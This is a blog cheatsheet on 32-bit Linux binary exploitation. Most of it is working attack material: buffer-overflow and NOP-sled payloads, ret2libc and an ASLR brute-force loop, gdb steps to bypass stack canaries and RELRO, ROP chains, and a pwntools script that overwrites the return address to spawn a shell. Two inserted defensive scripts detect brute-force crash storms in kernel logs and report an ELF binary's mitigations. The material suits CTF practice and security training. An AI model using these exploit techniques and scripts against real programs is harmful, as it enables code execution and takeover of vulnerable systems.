32-bit Binary Exploitation Cheatsheet


# Simple BOF
# jmp_address - an address somewhere near the start of the NOP sled
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address

# When the buffer is too small, put the NOP sled + shellcode in an environment variable and jump to it
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)
# Find the size of the stack frame (gdb)
p/d ($ebp-$esp)/4+4
# Update the size
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')

# DEP/NX Bypass
Ret2LIBC - Buffer + SYSTEM + EXIT + /bin/sh

# DEP + ASLR Bypass
# Same Ret2LIBC payload, saved to a file and re-run until the guessed libc addresses happen to match the randomised base
Ret2LIBC - Buffer + SYSTEM + EXIT + /bin/sh  > payload.txt
while true; do ./vuln $(cat payload.txt); done
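The loop above only works because every wrong guess crashes the target and the process is simply started again, and from the defensive side that leaves a very distinctive trail: the kernel logs each segfault. The script below is an added example, not part of the original cheatsheet. It parses kernel segfault lines as forwarded to syslog and alerts when one program faults repeatedly inside a short window, keeping the distinct pids and stack pointers that separate a brute-force loop (fresh process, moving stack, same guessed ip) from one buggy long-lived service. The log lines are constructed samples, and the syslog layout and the assumed year are assumptions.

```python
"""Flag the crash storm an ASLR brute-force loop leaves in the kernel log.
Standard library only; runs over the constructed sample log below."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Shape of a kernel segfault report as forwarded to syslog. The trailing
# "in <mapping>[base+size]" part is left optional because the kernel omits it
# when the faulting ip is not inside any mapping.
SEGFAULT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: "
    r"(?P<comm>[^\[\]]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
)

# Constructed sample (not from a real host): seven crashes of ./vuln in four
# seconds, each a new pid with the stack at a different randomised address
# while the guessed libc address (ip) stays the same, plus one unrelated
# browser crash, ordinary noise, and a lone crash much later.
SAMPLE_LOG = """\
Jan 10 12:00:00 host sshd[900]: Accepted publickey for dev from 10.0.0.5 port 51234 ssh2
Jan 10 12:00:01 host kernel: vuln[4201]: segfault at b7e1d3d0 ip b7e1d3d0 sp bffff0a4 error 4
Jan 10 12:00:01 host kernel: vuln[4202]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfa120a4 error 4
Jan 10 12:00:02 host kernel: vuln[4203]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfc4a0a4 error 4
Jan 10 12:00:02 host kernel: vuln[4204]: segfault at b7e1d3d0 ip b7e1d3d0 sp bf9130a4 error 4
Jan 10 12:00:03 host kernel: firefox[2211]: segfault at 0 ip 0804d3c1 sp bfa3e1c0 error 4 in firefox[8048000+200000]
Jan 10 12:00:03 host kernel: vuln[4205]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfe7c0a4 error 4
Jan 10 12:00:04 host kernel: vuln[4206]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfb010a4 error 4
Jan 10 12:00:04 host kernel: vuln[4207]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfd9e0a4 error 4
Jan 10 12:05:30 host kernel: vuln[4330]: segfault at b7e1d3d0 ip b7e1d3d0 sp bfc330a4 error 4
"""


def parse_segfault(line, year=2024):
    """Return a dict for a kernel segfault line, or None for any other line."""
    m = SEGFAULT_RE.search(line)
    if not m:
        return None
    # syslog timestamps carry no year, so one is assumed (labelled assumption)
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "comm": m["comm"], "pid": int(m["pid"]),
            "ip": int(m["ip"], 16), "sp": int(m["sp"], 16)}


def find_crash_storms(lines, threshold=5, window_seconds=10):
    """Sliding-window count of segfaults per program name.

    Returns {comm: summary} for every program that crashed at least
    `threshold` times within some span of `window_seconds`. The summary keeps
    the distinct pids and ip/sp values so an analyst can see whether it is a
    fresh process each time with a fixed guessed address (brute force) or
    one process dying repeatedly in the same place (an ordinary bug)."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ev = parse_segfault(line)
        if ev is None:
            continue
        q = recent[ev["comm"]]
        q.append(ev)
        # drop events that fell out of the window relative to the newest one
        while (ev["ts"] - q[0]["ts"]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            alerts[ev["comm"]] = {
                "count": len(q),
                "first": q[0]["ts"], "last": ev["ts"],
                "pids": {e["pid"] for e in q},
                "ips": {e["ip"] for e in q},
                "sps": {e["sp"] for e in q},
            }
    return alerts


if __name__ == "__main__":
    for comm, a in find_crash_storms(SAMPLE_LOG.splitlines()).items():
        span = (a["last"] - a["first"]).total_seconds()
        print(f"{comm}: {a['count']} segfaults in {span:.0f}s, "
              f"{len(a['pids'])} distinct pids, "
              f"ip values {[hex(i) for i in a['ips']]}")
```

Feed it `journalctl -k` or `/var/log/kern.log` output instead of the sample to use it on a host; the threshold and window are tuning knobs, and the single later crash in the sample shows that an isolated fault outside the window does not raise an alert.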

# Canary Bypass
- Set a breakpoint right after the canary cookie is created
- Find the address of the stack cookie and note it down
	- EX: DWORD PTR [esp+0x1c],eax
	- x/wx $esp+0x1c
- Use the RET2LIBC technique to exploit the program (Buffer + SYSTEM + EXIT + /bin/sh); after the buffer, we will restore the canary cookie
- Right before the cookie value is validated, pause the session and write the saved cookie value back
	# Get the stack cookie - canary
	gdb-peda$ x/wx $esp+0x1c
	0xbffff05c:	0xf6f56000
	# Restore it before the check runs
	gdb-peda$ set {int}0xbffff05c=0xf6f56000

# Canary + RELRO Bypass
# Find another function that is called through the GOT and send both addresses one after another
other_function system_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"')
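Every section from "DEP/NX Bypass" down to "Canary + RELRO Bypass" assumes you already know which mitigations the binary was built with, and the same question is the first thing a defender asks when hardening a build. The checker below is an added example, not code from the original cheatsheet: it reads the ELF32 header, program headers and dynamic section directly and reports NX (PT_GNU_STACK without the execute bit), PIE (an ET_DYN executable, the only kind ASLR can relocate), RELRO (partial when a GNU_RELRO segment exists, full when the loader is also told to bind everything at startup) and, as a heuristic, the stack canary (the binary references `__stack_chk_fail`). Because it works on bytes it also includes a constructed, non-loadable sample image for testing; that builder, the constant values copied from the ELF specification, and the command-line usage are the only assumptions.

```python
"""Report which mitigations an ELF32 binary was built with: NX, PIE (ASLR
of the main image), stack canary and RELRO. Standard library only; works on
raw bytes so it can be tested against the constructed sample image below."""
import struct

# Constants from the ELF specification / elf.h
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def parse_elf32(data):
    """Return (e_type, program_headers) for a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only little-endian ELF32 is handled here")
    # e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize
    # e_phentsize e_phnum, starting right after the 16-byte e_ident
    e_type, _, _, _, phoff, _, _, _, phentsize, phnum = \
        struct.unpack_from("<HHIIIIIHHH", data, 16)
    phdrs = []
    for i in range(phnum):
        p_type, p_offset, _, _, p_filesz, _, p_flags, _ = \
            struct.unpack_from("<IIIIIIII", data, phoff + i * phentsize)
        phdrs.append({"type": p_type, "offset": p_offset,
                      "filesz": p_filesz, "flags": p_flags})
    return e_type, phdrs


def dynamic_tags(data, phdrs):
    """Yield (d_tag, d_val) pairs from the PT_DYNAMIC segment, if present."""
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        for off in range(ph["offset"], ph["offset"] + ph["filesz"], 8):
            tag, val = struct.unpack_from("<iI", data, off)
            if tag == DT_NULL:
                return
            yield tag, val


def check_mitigations(data):
    """Return {'nx': bool, 'pie': bool, 'relro': str, 'canary': bool}."""
    e_type, phdrs = parse_elf32(data)
    tags = dict(dynamic_tags(data, phdrs))
    # NX: PT_GNU_STACK present and not executable. Without the header the
    # loader falls back to an executable stack, so that counts as NX off.
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    # ASLR only relocates the main binary if it is position independent
    # (ET_DYN); an ET_EXEC image keeps fixed .text/.plt/GOT addresses, which
    # is exactly what the hard-coded 0x0804xxxx addresses above depend on.
    pie = e_type == ET_DYN
    # RELRO: partial when a GNU_RELRO segment exists; full when the loader is
    # also told to bind everything at startup, making the GOT read-only.
    has_relro = any(p["type"] == PT_GNU_RELRO for p in phdrs)
    bind_now = bool(DT_BIND_NOW in tags
                    or tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                    or tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    relro = "full" if has_relro and bind_now else "partial" if has_relro else "none"
    # Canary: heuristic, code built with -fstack-protector imports __stack_chk_fail
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "pie": pie, "relro": relro, "canary": canary}


def build_sample_elf(nx=True, pie=False, relro="full", canary=True):
    """Constructed, non-loadable ELF32 image (header, program headers and a
    dynamic section only) with the requested mitigation flags, for testing."""
    phdrs = [(PT_GNU_STACK, 0, 0, 0x6 if nx else 0x7)]        # RW vs RWX stack
    if relro != "none":
        phdrs.append((PT_GNU_RELRO, 0, 0, 0x4))
    dyn = ([(DT_FLAGS, DF_BIND_NOW)] if relro == "full" else []) + [(DT_NULL, 0)]
    dyn_bytes = b"".join(struct.pack("<iI", t, v) for t, v in dyn)
    dyn_off = 52 + 32 * (len(phdrs) + 1)                      # right after phdrs
    phdrs.append((PT_DYNAMIC, dyn_off, len(dyn_bytes), 0x6))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8    # ELF32, LSB, v1
    hdr = ident + struct.pack("<HHIIIIIHHHHHH", ET_DYN if pie else ET_EXEC,
                              3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = b"".join(struct.pack("<IIIIIIII", t, off, 0, 0, sz, sz, fl, 4)
                    for t, off, sz, fl in phdrs)
    tail = b"__stack_chk_fail\x00" if canary else b""
    return hdr + body + dyn_bytes + tail


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        for name, value in check_mitigations(f.read()).items():
            print(f"{name:7}: {value}")
```

Run it as `python3 checkmitigations.py ./vuln` on a 32-bit target (the file name is a placeholder); a result of NX off, no PIE, no RELRO and no canary is the configuration the simplest payloads on this page need, and each mitigation that reports as present corresponds to one more bypass section above.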

# ROP Chaining
# Call the printf function first, then run your shell
# For a single jump use pop;ret (popret)
# For a double jump use pop;pop;ret (pop2ret)
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr

# NX with ASLR enabled - RET2PUTS / RET2System

from pwn import *

# system, exit and binsh hold the addresses found for the target's libc (not defined here)
payload = ""
payload += "A"*140             # junk buffer
payload += p32(system)         # EIP overwrite
payload += p32(exit)           # return address for system
payload += p32(binsh)          # argument to system
# ROP Exploit

from pwn import *

buffer = b"A" * 140                 # junk up to the saved return address

# Addresses for this particular target and its libc; change them for yours
printf_addr = p32(0xb7e31520)
pop_ret     = p32(0x80482c9)        # pop; ret gadget - removes printf's argument
print1_addr = p32(0x8048510)        # argument to printf

system_addr = p32(0xb7e1d3d0)
exit_addr   = p32(0xb7e105a0)
binsh_addr  = p32(0xb7f5e1db)

# Plain ret2libc chain without the printf call:
#payload = buffer + system_addr + exit_addr + binsh_addr

payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr

# Launch the vulnerable program and feed it the payload
p = process('./v1')
p.sendline(payload)                 # or pass it as an argument if the target reads argv
p.interactive()
# GET ENV Address

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Print where an environment variable will sit on the stack of the target
 * program; the offset corrects for the difference in program name length. */
int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(1);
	}
	ptr = getenv(argv[1]); /* get env var location */
	if(ptr == NULL) {
		printf("%s is not set\n", argv[1]);
		exit(1);
	}
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
	return 0;
}

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
